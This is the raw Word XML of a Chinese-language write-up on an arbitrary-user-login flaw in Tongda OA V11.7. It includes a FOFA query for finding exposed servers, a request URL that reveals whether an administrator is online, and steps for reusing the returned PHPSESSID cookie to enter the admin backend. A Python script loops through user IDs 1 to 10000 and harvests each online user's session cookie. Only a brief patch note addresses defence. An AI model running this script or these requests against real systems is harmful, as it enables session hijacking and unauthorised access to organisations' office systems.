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  <w:t>0x00前言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通达OA V11.7版本存在这个任意用户登录漏洞，该漏洞需要管理员在线才可以登录系统，另外一个方面就是编译在线的uid值进行判断。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具体fofa语法放在下面：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EEEEE" w:sz="4" w:space="4"/>
          <w:left w:val="single" w:color="EEEEEE" w:sz="4" w:space="4"/>
          <w:bottom w:val="single" w:color="EEEEEE" w:sz="4" w:space="4"/>
          <w:right w:val="single" w:color="EEEEEE" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:shd w:val="clear" w:fill="F8F8F8"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="444444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app="TDXK-通达OA"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="2595880"/>
            <wp:effectExtent l="0" t="0" r="57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  <w:t>0x01在线用户判断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访问：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http：// xxx。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xxx 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xxx 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xxx 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instrText xml:space="preserve"> HYPERLINK "http://127.0.0.1/mobile/auth_mobi.php?isAvatar=1&amp;uid=1&amp;P_VER=0" \o "" \t "https://www.adminxe.com/_blank"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t>/mobile/auth_mobi.php?isAvatar=1&amp;uid=1&amp;P_VER=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="00A67C"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18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如果页面时空白的，则说明管理员在线，即可以利用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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="1317625"/>
            <wp:effectExtent l="0" t="0" r="317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如果显示RELOGIN，则不可以利用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right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="1712595"/>
            <wp:effectExtent l="0" t="0" r="571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288" w:right="-240" w:firstLine="36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  <w:t>0x02任意用户登录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/>
        <w:ind w:left="0" w:right="0" w:firstLine="36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  <w:t>获取到uid = 1的cookie</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264150" cy="269684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PHPSESSID=cgjuu4kohb2ntpha8inia7e4q2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同时访问即可进行登录后台：http://127.0.0.1/general/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690" cy="2438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  <w:t>0x03 POC检测脚本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BFBFB"/>
        </w:rPr>
        <w:t>通过遍历uid的值，判断用户是否上线过，实现任意用户登录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 = sys.argv[1]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>for i in range(1,10000):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    try :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        vuln_url = url + "/mobile/auth_mobi.php?isAvatar=1&amp;uid="+str(i)+"&amp;P_VER=0"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        resp = requests.get(vuln_url)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        soup = BeautifulSoup(resp.text,'html.parser')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if 'RELOGIN' in soup.get_text():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print("不存在")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PHPSESSION = re.findall(r'PHPSESSID=(.*?);', str(resp.headers))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print('uid='+str(i)+"在线"+"对应的COOKIE值是：PHPSESSID="+str(PHPSESSION[0]))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6"/>
          <w:bottom w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:right w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:pBdr>
        <w:shd w:val="clear" w:fill="FBFBFB"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0" w:line="216" w:lineRule="atLeast"/>
        <w:ind w:left="-288" w:right="-240" w:firstLine="36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BFBFB"/>
        </w:rPr>
        <w:t>0x04 修复建议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更新补丁，https://www.tongda2000.com/download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6FC1"/>
    <w:rsid w:val="10547048"/>
    <w:rsid w:val="13492689"/>
    <w:rsid w:val="18A51F12"/>
    <w:rsid w:val="1AC26342"/>
    <w:rsid w:val="1BB04286"/>
    <w:rsid w:val="224E3A70"/>
    <w:rsid w:val="23B44FDB"/>
    <w:rsid w:val="23DC1B5C"/>
    <w:rsid w:val="26970BDE"/>
    <w:rsid w:val="2C7A0E27"/>
    <w:rsid w:val="331C18AC"/>
    <w:rsid w:val="42970222"/>
    <w:rsid w:val="43847262"/>
    <w:rsid w:val="448849F3"/>
    <w:rsid w:val="48FE625C"/>
    <w:rsid w:val="4B975412"/>
    <w:rsid w:val="534B2F9E"/>
    <w:rsid w:val="57D90875"/>
    <w:rsid w:val="584B7418"/>
    <w:rsid w:val="58D57E07"/>
    <w:rsid w:val="5BA7181A"/>
    <w:rsid w:val="5C7B2CEE"/>
    <w:rsid w:val="6196757B"/>
    <w:rsid w:val="68725833"/>
    <w:rsid w:val="6E9D3CA0"/>
    <w:rsid w:val="70D63F29"/>
    <w:rsid w:val="734B03F7"/>
    <w:rsid w:val="76B34C5A"/>
    <w:rsid w:val="7C2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2021-03-09T07:37:00Z</dcterms:created>
  <dc:creator>wll</dc:creator>
  <cp:lastModifiedBy>wll</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-03-09T07:45:53Z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